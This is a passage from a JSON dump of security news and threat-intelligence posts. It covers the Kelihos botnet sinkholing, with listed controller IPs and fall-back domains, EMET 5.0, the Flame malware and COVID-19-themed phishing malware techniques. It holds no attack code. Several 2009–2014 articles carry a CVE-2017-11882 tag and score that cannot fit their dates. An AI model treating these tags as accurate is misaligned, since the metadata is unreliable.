had risen as high as 552 users per hour. 
[Read the full story](<http://www.eweek.com/c/a/Security/Pirated-Windows-7-Builds-a-Botnet-With-Trojan-456054/>) [eweek.com]\n", "cvss3": {}, "published": "2009-05-12T22:23:28", "type": "threatpost", "title": "Pirated Windows 7 builds botnet with Trojan", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:12", "id": "THREATPOST:AA7C9EFD06F74FBC5580C0384A39AA56", "href": "https://threatpost.com/pirated-windows-7-builds-botnet-trojan-051209/72691/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:19", "description": "SAN FRANCISCO \u2013 Enterprises beat up by wave after wave of Java exploits and calls to disable the platform may soon have some relief in sight.\n\nMicrosoft\u2019s free Enhanced Mitigation Experience Toolkit will soon have a new feature that allows users to configure where plug-ins, especially those targeted by hackers such as Java and Adobe Flash, are allowed to run by default. The feature is called Attack Surface Reduction, and it\u2019s one of two that Microsoft has made available in a [technical preview of EMET 5.0](<http://blogs.technet.com/b/srd/archive/2014/02/21/announcing-emet-5-0-technical-preview.aspx>) released today at RSA Conference 2014.\n\n\u201cASR is going to help a lot of people,\u201d said Microsoft software security engineer Jonathan Ness.\n\nBlocking Java outright, despite some of the dire attacks reported during the past 15 months, isn\u2019t an option for most companies that have built custom Java applications for critical processes such as payroll or human resources. 
With 5.0, users will have the option to run plug-ins in the Intranet zone while blocking them in the browser\u2019s Internet zone, or vice-versa.\n\n\u201cIt gives customers more control over how plug-ins are loaded into applications,\u201d said Ness, explaining users will have the flexibility, for example, to allow Flash to load in a browser, but block it in an Office application such as Word or Excel. A number of advanced attacks have contained malicious embedded Flash files inside benign Word documents or Excel spreadsheets. Microsoft hopes to use feedback received on the Technical Preview to shape the final 5.0 product.\n\n\u201cFeedback is really valuable, and has helped shape this tool,\u201d Ness said, adding that the release of EMET 4.1 was delayed right before launch to correct a shortcoming pointed out by a beta user. The customer was not pleased with EMET\u2019s automatic termination of applications upon detecting an exploit, rather than having a configuration option available where the event could be logged and analyzed later.\n\nMicrosoft has been vocal about recommending EMET as a temporary mitigation for zero-day attacks against previously unreported vulnerabilities. EMET includes a dozen mitigations that block exploit attempts targeting memory vulnerabilities. Most of the mitigations are for return-oriented programming exploits, in addition to memory-based mitigations ASLR, DEP, heap spray and SEHOP protections. EMET is not meant as a permanent fix, but only as a stopgap until a patch is ready for rollout.\n\nThe second new feature in the EMET 5.0 Technical Preview is a number of enhanced capabilities to Export Address Table Filtering, or EAF+. Ness said EAF+ blocks how shellcode calls are made into EA table filtering.\n\n\u201cWith OS functions such as open file or create process, exported code wants to jump into EAF. This filters the shellcode and blocks it if it\u2019s an exploit,\u201d Ness said. 
\u201cWe\u2019re extending that with new filtering (KERNELBASE exports and additional integrity checks on stack registers and limits).\u201d\n\nEMET raises development costs for exploit writers with its memory protections, so much so that the recent Operation SnowMan APT attack included a module that detected whether an EMET library was present and if so, the exploit would not execute itself. Researchers have developed bypasses of EMET\u2019s mitigations, first Aaron Portnoy of Exodus Intelligence last summer, and most recently, researchers at Bromium Labs who developed a complete EMET bypass.\n\nMicrosoft\u2019s Ness said improvements to EMET\u2019s Deep Hooks API protections have been rolled into the 5.0 Technical Preview that address the Bromium bypass. Whether it remains on by default in the final 5.0 remains to be seen as application compatibility issues have to be resolved first, Ness said.\n", "cvss3": {}, "published": "2014-02-25T16:37:11", "type": "threatpost", "title": "Microsoft EMET 5.0 Technical Preview Released", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-02-25T21:37:11", "id": "THREATPOST:FD699B5CBB882E8FB3DDF3341B557D27", "href": "https://threatpost.com/emet-5-0-technical-preview-offers-secure-plug-in-control/104490/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:45", "description": "Earlier this week, Microsoft released [an announcement](<https://threatpost.com/botnet-shutdown-success-story-how-kaspersky-lab-disabled-hluxkelihos-botnet-092911/>) about the disruption of a dangerous botnet that was responsible for spam messages, theft of sensitive financial information, pump-and-dump stock scams and distributed denial-of-service attacks.\n\nKaspersky Lab played a critical role in this botnet takedown initiative, leading the way to reverse-engineer the bot malware, crack the communication protocol and develop tools to 
attack the peer-to-peer infrastructure. We worked closely with Microsoft\u2019s Digital Crimes Unit (DCU), sharing the relevant information and providing them with access to our live botnet tracking system.\n\nA key part of this effort is the sinkholing of the botnet. It\u2019s important to understand that the botnet still exists \u2013 but it\u2019s being controlled by Kaspersky Lab. In tandem with Microsoft\u2019s move to the U.S. court system to disable the domains, we started to sinkhole the botnet. Right now we have 3,000 hosts connecting to our sinkhole every minute. This post describes the inner workings of the botnet and the work we did to prevent it from further operation.\n\nLet\u2019s start with some technical background: Kelihos is Microsoft\u2019s name for what Kaspersky calls Hlux. Hlux is a peer-to-peer botnet with an architecture similar to the one used for the Waledac botnet. It consists of layers of different kinds of nodes: controllers, routers and workers. Controllers are machines presumably operated by the gang behind the botnet. They distribute commands to the bots and supervise the peer-to-peer network\u2019s dynamic structure. Routers are infected machines with public IP addresses. They run the bot in router mode, host proxy services, participate in a fast-flux collective, and so on. Finally, workers are infected machines that do not run in router mode, simply put. They are used for sending out spam, collecting email addresses, sniffing user credentials from the network stream, etc. A sketch of the layered architecture is shown below with a top tier of four controllers and worker nodes displayed in green.\n\n\n\n_Figure 1: Architecture of the Hlux botnet_\n\n**Worker Nodes**\n\nMany computers that can be infected with malware do not have a direct connection to the Internet. They are hidden behind gateways, proxies or devices that perform network address translation. 
Consequently, these machines cannot be accessed from the outside unless special technical measures are taken. This is a problem for bots that organize infected machines in peer-to-peer networks as that requires hosting services that other computers can connect to. On the other hand, these machines provide a lot of computing power and network bandwidth. A machine that runs the Hlux bot would check if it can be reached from the outside and if not, put itself in the worker mode of operation. Workers maintain a list of peers (other infected machines with public IP addresses) and request jobs from them. A job contains things like instructions to send out spam or to participate in denial-of-service attacks. It may also tell the bot to download an update and replace itself with the new version.\n\n**Router Nodes**\n\nRouters form some kind of backbone layer in the Hlux botnet. Each router maintains a peer list that contains information about other peers, just like worker nodes. At the same time, each router acts as an HTTP proxy that tunnels incoming connections to one of the Controllers. Routers may also execute jobs, but their main purpose is to provide the proxy layer in front of the controllers.\n\n**Controllers**\n\nThe controller nodes are the top visible layer of the botnet. Controllers host a nginx HTTP server and serve job messages. They do not take part in the peer-to-peer network and thus never show up in the peer lists. There are usually six of them, spread pairwise over different IP ranges in different countries. Each two IP addresses of a pair share an SSH RSA key, so it is likely that there is really only one box behind each address pair. From time to time some of the controllers are replaced with new ones. 
Right before the botnet was taken out, the list contained the following entries:\n\n193.105.134.189 \n193.105.134.190 \n195.88.191.55 \n195.88.191.57 \n89.46.251.158 \n89.46.251.160\n\n**The Peer-to-Peer Networks**\n\nEvery bot keeps up to 500 peer records in a local peer list. This list is stored in the Windows registry under HKEY_CURRENT_USER\\Software\\Google together with other configuration details. When a bot starts on a freshly infected machine for the first time, it initializes its peer list with some hard-coded addresses contained in the executable. The latest bot version came with a total of 176 entries. The local peer list is updated with peer information received from other hosts. Whenever a bot connects to a router node, it sends up to 250 entries from its current peer list, and the remote peer sends 250 of its entries back. By exchanging peer lists, the addresses of currently active router nodes are propagated throughout the botnet. A peer record stores the information shown in the following example:\n\nm_ip: 41.212.81.2 \nm_live_time: 22639 seconds \nm_last_active_time: 2011-09-08 11:24:26 GMT \nm_listening_port: 80 \nm_client_id: cbd47c00-f240-4c2b-9131-ceea5f4b7f67 \n\nThe peer-to-peer architecture implemented by Hlux has the advantage of being very resilient against takedown attempts. The dynamic structure allows for fast reactions if irregularities are observed. When a bot wants to request jobs, it never connects directly to a controller, no matter if it is running in worker or router mode. A job request is always sent through another router node. So, even if all controller nodes go off-line, the peer-to-peer layer remains alive and provides a means to announce and propagate a new set of controllers.\n\n**The Fast-Flux Service Network**\n\nThe Hlux botnet also serves several fast-flux domains that are announced in the domain name system with a TTL value of 0 in order to prevent caching. 
A query for one of the domains returns a single IP address that belongs to an infected machine. The fast-flux domains provide a fall-back channel that can be used by bots to regain access to the botnet if all peers in their local list are unreachable. Each bot version contains an individual hard-coded fall-back domain. Microsoft unregistered these domains and effectively decommissioned the fall-back channel. Here is the set of DNS names that were active before the takedown \u2013 in case you want to keep an eye on your DNS resolver. If you see machines asking for one of them, they are likely infected with Hlux and should be taken care of.\n\nhellohello123.com \nmagdali.com \nrestonal.com \neditial.com \ngratima.com \npartric.com \nwargalo.com \nwormetal.com \nbevvyky.com \nearplat.com \nmetapli.com\n\nThe botnet further used hundreds of sub-domains of ce.ms and cz.cc that can be registered without a fee. But these were only used to distribute updates and not as a backup link to the botnet.\n\n**Counteractions**\n\nA bot that can join the peer-to-peer network won\u2019t ever resolve any of the fall-back domains \u2013 it does not have to. In fact, our botnet monitor has not logged a single attempt to access the backup channel during the seven months it was operated as at least one other peer has always been reachable.\n\nThe communication for bootstrapping and receiving commands uses a special custom protocol that implements a structured message format, encryption, compression and serialization. The bot code includes a protocol dispatcher to route incoming messages (bootstrap messages, jobs, SOCKS communication) to the appropriate functions while serving everything on a single port. We reverse engineered this protocol and created some tools for decoding botnet traffic. 
Being able to track bootstrapping and job messages for an intentionally infected machine provided a view of what was happening with the botnet, when updates were distributed, what architectural changes were undertaken and also to some extent how many infected machines participate in the botnet.\n\n\n\n_Figure 2: Hits on the sinkhole per minute_\n\nThis Monday, we started to propagate a special peer address. Very soon, this address became the most prevalent one in the botnet, resulting in the bots talking to our machine, and to our machine only. Experts call such an action sinkholing \u2013 bots communicate with a sinkhole instead of its real controllers. At the same time, we distributed a specially crafted list of job servers to replace the original one with the addresses mentioned before and prevent the bots from requesting commands. From this point on, the botnet could not be commanded anymore. And since we have the bots communicating with our machine now, we can do some data mining and track infections per country, for example. So far, we have counted 49,007 different IP addresses. Kaspersky works with Internet service providers to inform the network owners about the infections.\n\n\n\n_Figure 3: Sinkholed IP addresses per country_\n\n**What now?**\n\nThe main question is now: what is next? We obviously cannot sinkhole Hlux forever. The current measures are a temporary solution, but they do not ultimately solve the problem, because the only real solution would be a cleanup of the infected machines. We expect that the number of machines hitting our sinkhole will slowly lower over time as computers get cleaned and reinstalled. Microsoft said their Malware Protection Center has added the bot to their Malicious Software Removal Tool. Given the spread of their tool this should have an immediate impact on infection numbers. However, in the last 16 hours we have still observed 22,693 unique IP addresses. 
We hope that this number is going to be much lower soon.\n\nInterestingly, there is one other theoretical option to ultimately get rid of Hlux: we know how the bot\u2019s update process works. We could use this knowledge and issue our own update that removes the infections and terminates itself. However, this would be illegal in most countries and will thus remain theoretical.\n\n_Tillmann Werner is a senior malware analyst at Kaspersky Lab._\n", "cvss3": {}, "published": "2011-09-29T15:10:41", "type": "threatpost", "title": "The Inside Story of the Kelihos Botnet Takedown", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-05-01T20:51:46", "id": "THREATPOST:E77302403616F2E9A6C7DA2AD2B1F880", "href": "https://threatpost.com/botnet-shutdown-success-story-how-kaspersky-lab-disabled-hluxkelihos-botnet-092911/75703/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:03:26", "description": "When one Pennsylvanian man couldn\u2019t foot his bills, he opted to steal the identity of someone who could \u2013 one of the world\u2019s richest men, Microsoft co-founder and billionaire Paul Allen.\n\nAn AWOL soldier from Pittsburgh swiped Allen\u2019s Citibank credit card account information earlier this year to make a $658.81 payment on a loan from the Armed Forces Bank, according to an [Associated Press report](<http://www.washingtonpost.com/business/fbi-awol-pa-soldier-obtained-microsoft-co-founder-debit-card-by-changing-account-address/2012/03/27/gIQAUqoodS_story.html>).\n\nA criminal complaint unsealed Monday claims that after acquiring Allen\u2019s account information, the soldier, Brandon Lee Prince, 28, changed the address of the card to his own and reported it missing in an attempt to have a new card sent to his Pittsburgh address. 
The card was delivered, and soon after the fraudulent charges began to pile up.\n\nOn top of the loan payment, it was also used at a Pittsburgh GameStop ($278.18), a Family Dollar ($1) and at a Western Union, where Price tried to process a $15,000 transaction.\n\nThe bank noticed the illicit charges and promptly notified the FBI, which had an agent follow Price around the neighborhood. After seeing him wearing the same clothes he wore in surveillance footage taken at the GameStop and Family Dollar stores, Price was arrested on March 2.\n\nAccording to authorities, Price had actually been away from the army since June 2010 and was wanted as a deserter.\n\nAllen, who helped found Microsoft with Bill Gates in 1975, also owns the NBA\u2019s Portland Trailblazers and the NFL\u2019s Seattle Seahawks and has a net worth of about $14.2 billion, [according to Forbes](<http://www.forbes.com/profile/paul-allen/>) \u2013 enough to rank at number 48 on the [publication\u2019s list](<http://www.forbes.com/billionaires/#p_1_s_a0_All%20industries_All%20countries_All%20states_>) of the richest people on the planet.\n\nFor more on this, check out the AP report via the [Washington Post](<http://www.washingtonpost.com/business/fbi-awol-pa-soldier-obtained-microsoft-co-founder-debit-card-by-changing-account-address/2012/03/27/gIQAUqoodS_story.html>).\n", "cvss3": {}, "published": "2012-03-29T15:56:05", "type": "threatpost", "title": "Fortune Favors the Bold? 
Man Steals Microsoft Founder's Identity, Credit Card", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:32:32", "id": "THREATPOST:51AB3DBBFBFCA1EDCCB83FCECB47C07B", "href": "https://threatpost.com/fortune-favors-bold-man-steals-microsoft-founder-s-identity-credit-card-032912/76380/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:02:53", "description": "The attackers behind Flame can easily clean up compromised computers, according to research by security firm Symantec, which found that some attackers have been able to use command-and-control (C&C) servers to completely remove the malware from certain machines.\n\nAccording to a post on [Symantec\u2019s Security Response blog](<https://threatpost.com/attackers-can-use-self-destruct-feature-kill-flame-060812/>) yesterday, C&C servers can send a file to infected computers to \u201cuninstall\u201d the Flame malware. The file, Browse32.ocx, then goes on to search the infected computer for every file used by Flame, removes them and even overwrites the disk with random bits of information and characters to cover its tracks.\n\nAccording to Symantec\u2019s analysis, the module contains two different exports: EnableBrowser, which initializes the module, and StartBrowse, which does the actual deletion of the Flame files. Symantec also adds that the module appears to have been created on May 9 and looks similar to SUICIDE, an older module previously found in Flame\u2019s code.\n\nFlame was discovered in recent months and [disclosed by the Iranian government and western firms last week](<https://threatpost.com/whats-meaning-flame-malware-052912/>). The worm quickly drew comparisons to Stuxnet and Duqu. 
While the malware has apparently existed for years, it wasn\u2019t until this week that it was revealed the attackers [used a collision attack](<https://threatpost.com/microsoft-details-flame-hash-collision-attack-060612/>) to get the malware to [exploit a fraudulent certificate](<https://threatpost.com/flame-malware-uses-forged-microsoft-certificate-validate-components-060412/>) from Microsoft to attack Windows systems.\n", "cvss3": {}, "published": "2012-06-08T17:32:37", "type": "threatpost", "title": "Attackers Can Use 'Self-Destruct' Feature to Kill Flame", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:32:05", "id": "THREATPOST:6E2DD8B76555337B1AB3A01AE147EA68", "href": "https://threatpost.com/attackers-can-use-self-destruct-feature-kill-flame-060812/76669/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:55", "description": "This video features Tim Rains and Vinny Gullotto of Microsoft discussing the major threats from the second half of 2008.\n", "cvss3": {}, "published": "2009-06-22T10:33:11", "type": "threatpost", "title": "Microsoft Security Intelligence Report: The Vinny and Tim Show", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:38:58", "id": "THREATPOST:D40D286C87360AFDC61FCD9AD506D78F", "href": "https://threatpost.com/microsoft-security-intelligence-report-vinny-and-tim-show-062209/72853/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "carbonblack": [{"lastseen": "2019-12-11T13:20:10", "description": "Trend Micro released a white paper about Tick, a Chinese cyberespionage threat actor targeting east asian countries. The report details several new downloader malware families. 
VMware Carbon Black Threat Analysis Unit (TAU) reviewed the malware and is providing product rules to detect and identify the malware.\n\n## Behavior Summary\n\nThe Trend Micro report stated that the downloaders were deployed by using the right-to-left override (RTLO) technique or by exploiting the CVE-2018-0802 and CVE-2018-0798 vulnerabilities. The downloaders have code which is used to detect antivirus products.\n\nThe CB ThreatHunter process diagram shows the downloader activity after it is deployed by the dropper. As the dropper only sets up persistence, a reboot is required for the downloader to run.\n\nAdditionally, CB Defense will display the malware\u2019s overall triggered TTPs.\n\nTo learn more, [click here.](<https://community.carbonblack.com/t5/Threat-Research-Docs/TAU-TIN-Tick-downloaders-Operation-ENDTRADE/ta-p/83641>)\n\nThe post [Threat Analysis Unit (TAU) Threat Intelligence Notification: Tick Downloaders (Operation ENDTRADE)](<https://www.carbonblack.com/2019/12/10/threat-analysis-unit-tau-threat-intelligence-notification-tick-downloaders-operation-endtrade/>) appeared first on [VMware Carbon Black](<https://www.carbonblack.com>).", "edition": 2, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-12-10T15:34:53", "type": "carbonblack", "title": "Threat Analysis Unit (TAU) Threat Intelligence Notification: Tick Downloaders (Operation ENDTRADE)", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", 
"confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-0798", "CVE-2018-0802"], "modified": "2019-12-10T15:34:53", "id": "CARBONBLACK:5FC3EC6D315A733A8D566BD7A42A12FE", "href": "https://www.carbonblack.com/2019/12/10/threat-analysis-unit-tau-threat-intelligence-notification-tick-downloaders-operation-endtrade/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-03-19T21:36:32", "description": "The global COVID-19 pandemic is generating a substantial uptick in the production and delivery of Coronavirus themed malware. Due to a rapidly growing number of Indicators of Compromise (IOC)\u2019s, this report covers the key behaviors by aligning to the MITRE ATT&CK Framework. \n\n[_MITRE ATT&CK_](<https://attack.mitre.org/>)_ launched in 2018 is a security framework that describes the various stages through which an attack will generally progress. The intent of the framework is to provide \u201cbetter detection of post-compromise cyber adversary behavior\u201d_. _This framework is gaining increased adoption in the security community and VMware Carbon Black actively maps our products to this framework to provide added context for our customers._\n\nPhishing emails are the primary source, which in turn manifest into harmful threats that include malicious attachments that deliver payloads to infect victim machines. Some recently observed payloads are delivering trojans, backdoors, remote access trojan (RAT) functionality, cryptominers and botnet participation. In one variant that was analyzed, the malware was found to overlap with the APT41 (also referred to as WINNTI) threat group which has traditionally been an APT actor based in China. 
Malicious functionality has also been observed in fake mobile apps, fake Coronavirus maps and fake VPN software. These recent observations show an increased overall risk to corporate as well as personal security, at a time where many countries and corporations are enforcing remote working. \n\n## **Background**\n\nThe COVID-19 global pandemic has created an unprecedented situation with far-reaching impacts on our daily lives. Many countries have encouraged or mandated social isolation, including working remotely, in an effort to contain the spread of the virus. Much is still unknown leading to a climate of uncertainty. Unfortunately during times of uncertainty and doubt, threat actors are ready to take advantage of the widespread desire to be informed. This is already happening with the Coronavirus. People and businesses who are already in a heightened state of emotion, and on overload with changes in all aspects of their lives, are now at risk from bad actors intent on stealing PII, sensitive information, payment details and more, simply by using luring tactics that feature Coronavirus themed malware. \n\nWhile this technique isn\u2019t new, history has proven that cyber crime often increases during times of heightened emotion, distraction and stress, such as certain religious or [festive](<https://www.bleepingcomputer.com/news/security/emotet-trojan-is-inviting-you-to-a-malicious-christmas-party/>) holidays, [elections](<https://www.darkreading.com/attacks-breaches/trump-themed-malware-dominating-threat-campaigns-this-election-season/d/d-id/1327211>), and even [Black Friday](<https://www.infosecurity-magazine.com/news/fake-black-friday-apps-cause/>) sales events. The actors exploit these challenging times to find avenues for distributing their malware. \n\nThis article aims to increase awareness of recently observed threats that are leveraging the COVID-19 pandemic by describing current examples in alignment with the MITRE ATT&CK Framework. 
MITRE ATT&CK has had a major impact on the cybersecurity industry due to its rapid adoption in the security community. Aligning to the MITRE ATT&CK Framework is important as there is a growing number of IOC\u2019s being produced daily. Historically, such as in the case of Emotet, handling such large volumes of IOC\u2019s can become overwhelming for defenders. Understanding the behavioral patterns of the different types of threats allows for easier interpretation and proactive defense. \n\nThe intent is to raise awareness for customers, SOC teams, IR partners, MSSPs and all defenders out in the InfoSec community, and to aid them with detection, protection and response to such malware. To that end, we will be examining the types of attacks that appear to be most common.\n\nFor further information and resources pertaining to COVID-19, please refer to the VMware Carbon Black COVID-19: [Cybersecurity Community Resources](<https://www.carbonblack.com/2020/03/17/covid-19-cybersecurity-community-resources/>) page. \n\n## **Technical Analysis**\n\nIn the following section we will focus on the first two phases of the MITRE ATT&CK framework: **Initial Access** and **Execution**. We focus on these phases because we have observed the largest overlap from multiple actors that we are tracking. VMware Carbon Black\u2019s Threat Analysis Unit will continue to follow up with detailed analysis of individual actors and campaigns, digging deeper into the later stages of the attack.\n\nBefore we introduce these two tactic categories, we would like to specifically highlight one of the most frequently leveraged techniques. [Masquerading (T1036)](<https://attack.mitre.org/techniques/T1036/>) occurs when the name or location of an executable, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. It is one of the key techniques employed in many of the observed threat types. 
While this may not come as a surprise, educating your end users, family and friends should be a priority during this unsettling time. Similar to campaigns that target religious or festive holidays, masquerading is the perfect tactic used by the bad actors, who have no regard for their victims. Their mission is clear, and masquerading helps them to evade defenses and get a few steps closer to achieving their goals. \n\n## **Initial Access**\n\nThis is the first tactic employed by bad actors whose hopes are to compromise as many vulnerable machines as possible. While many people and businesses are trying to share legitimate information related to COVID-19, the sheer volume of information being communicated lends itself to the delivery of fake data sheets, infographics, links to tracking maps, as well as fake software. The intent is to catch the end user off guard in order to deliver the malware. Other tactics could also include [drive-by compromise (T1189)](<https://attack.mitre.org/techniques/T1189/>) or [supply chain compromise (T1195)](<https://attack.mitre.org/techniques/T1195/>). The rationale behind this is the rapid registration of coronavirus themed domain names that have appeared on [MalwarePatrol.net](<https://www.malwarepatrol.net/>). The count at the time of writing is currently over 5000 registered domain names. Using Coronavirus or COVID-19 themed domain names could easily trick legitimate users into visiting websites and becoming subject to drive-by or supply chain compromise. The list can be found [here](<https://www.malwarepatrol.net/wp-content/uploads/2020/03/covid-19-domains.txt>). \n\n### [**Spearphishing Attachment - TID:T1193**](<https://attack.mitre.org/techniques/T1193/>)\n\nAttachments are a popular choice for obtaining initial infection. Observed attachment file types include, but are not limited to, files with the following extensions: ZIP, 7Z, TAR, RAR, JAR, VBS, IMG, GZ, EXE, ISO, SCR, RTF, PDF, DOC, XLS. 
Examples of phishing emails may contain spoofed email headers and authentic messaging to lure the victim into a false sense of security. Attachment names observed also include names that are attention grabbing in order to arouse enough curiosity for the end user to feel the need to open it. Phishing emails can contain spelling, grammar or formatting mistakes, as shown in the example below. With that said, more advanced threat actors will be particularly good at producing an authentic looking email message, as we will see later in this report. \n\n[](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/1-Phishing-email-example-1.png>) \n\n**Figure 1: Phishing email example containing malicious Word document attachment**\n\nA common technique is to create interesting content for malicious Microsoft Office related email attachments in order to convince the user to click on a link. This typically will invoke the underlying malicious code embedded within the document, which is usually a malicious MS Office macro using VBA code. \n\n[](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/2-Phishing-email-example-1-Word-macro.png>) \n\n**Figure 2: Typical end-user prompt to trigger embedded payload**\n\nIn our next example we see an ISO file included as an attachment. \n\n[](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/3-Phishing-email-example-2.png>) \n\n**Figure 3: Phishing email example containing malicious ISO file attachment**\n\nThe ISO attachment contains a SCR file which is actually a PE file. When executed, the PE file deploys RemCos, a prolific RAT which is being continually updated and sold on the Dark Web. The flow diagram below gives a visual representation of the underlying effects of opening this particular email attachment. 
\n\n[](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/4-CBD-Flow-SCR.png>) \n\n**Figure 4: Partial process flow diagram taken from VMware Carbon Black Endpoint Standard**\n\nIn the next example, a PDF attachment contains a clickable link which redirects the user to an external site hosting a PHP page. \n\n[](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/5-PDF-attachment-example-1.png>) \n\n**Figure 5: Example PDF Attachment containing clickable link**\n\nIf the user clicks the link within the PDF, they are presented with a fake Office365 landing page masquerading as a legitimate Office365 page. \n\n[](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/6-PDF-attachment-fake-Office-365-page.png>) \n\n**Figure 6: Fake Office365 landing page**\n\nAfter the user clicks on the \u201cdownload file\u201d button, they are presented with a fake Office365 login prompt which harvests any details entered by the end user. \n\n[](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/7-PDF-attachment-fake-Office-365-creds.png>) \n\n**Figure 7: Fake Office365 login prompt**\n\nIn the next example an attachment named **ALL UPDATED INFORMATION FROM CDC ON COVID-19 IN YOUR AREA.7z** contains an executable, which when opened deploys **AgentTesla**. AgentTesla is used by threat actors to record keystrokes and other sensitive information, and to receive them via their C2 channel. \n\n[](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/8-7z-example.png>) \n\n**Figure 8: 7z file containing executable**\n\nAnother example uses an attachment named **AWARENESS NOTICE ON CORONAVIRUS COVID-19 DOCUMENT_pdf.exe** which, when opened, launches [RegAsm (T1121)](<https://attack.mitre.org/techniques/T1121/>) to deliver **Lokibot**, another popular and highly effective information stealer. This attachment contains an embedded AutoIT script to deliver the main payload. 
\n\n[](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/9-AutoIT-obfuscated-script.png>) \n\n**Figure 9: Snippet of hex dump showing obfuscated AutoIT script embedded in PE file**\n\nAnother attachment named COVID-19.INFO.37842702.doc installs a trojan by leveraging [PowerShell (T1086)](<https://attack.mitre.org/techniques/T1086/>) and CSCRIPT (a technique used for [signed script proxy execution (T1216)](<https://attack.mitre.org/techniques/T1216/>)) to launch a VBS file, which is a common [scripting (T1064)](<https://attack.mitre.org/techniques/T1064/>) technique. \n\n[](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/10-trojan-example.png>) \n\n**Figure 10: Execution path displayed within VMware Carbon Black EDR**\n\n## Execution\n\n[User execution (T1204)](<https://attack.mitre.org/techniques/T1204/>) describes the case where an end user opens a phishing email or attachment. There are other specific TTP\u2019s that have been observed with the execution of Coronavirus themed payloads. \n\n### [Powershell (T1086):](<https://attack.mitre.org/techniques/T1086/>)\n\nWhen a particular MS Word document attachment named \u201c**CORONA VIRUS REMEDY ISREAL.doc**\u201d is opened, it executes an obfuscated command within a hidden PowerShell window. This in turn invokes two signed Microsoft binaries, **csc.exe** and **cvtres.exe**, which are commonly seen with the [compile after delivery (T1500)](<https://attack.mitre.org/techniques/T1500/>) defense evasion technique. These types of behaviours are commonly seen in commodity malware, and are highly effective at delivering and compiling a payload using legitimate Windows binaries. 
\n\n[](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/11-Powershell-snippet.png>) \n\n\n**Figure 11: Snippet of obfuscated Powershell command**\n\n### [Dynamic Data Exchange (T1173):](<https://attack.mitre.org/techniques/T1173/>)\n\nMalicious MS Office documents still manage to successfully exploit unpatched versions of MS Office due to the typical DDE vulnerabilities. Some of these common CVE\u2019s are: [CVE-2012-0158](<https://docs.microsoft.com/en-us/security-updates/securitybulletins/2012/ms12-027#mscomctlocx-rce-vulnerability---cve-2012-0158>), [CVE-2017-11882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882>) and [CVE-2018-0798](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0798>). \n\nIn a recent Coronavirus themed MS Word document attachment, MS Word is the target for [exploitation for client execution (T1203)](<https://attack.mitre.org/techniques/T1203/>) using DDE exploits to launch the MS Equation Editor. The purpose is to deliver and execute a [signed binary proxy execution (T1218)](<https://attack.mitre.org/techniques/T1218/>), which in this instance was found to overlap with the APT41 (also referred to as WINNTI) threat group which has traditionally been an APT actor based in China. The VMware Carbon Black TAU team is still investigating this particular threat.\n\n## **More on Masquerading**\n\nMasquerading has been highlighted so far in relation to malicious phishing email attachments. Unfortunately third party software is not excluded from this. There is evidence to suggest that the following categories of software are being weaponised in order to target potential victims. 
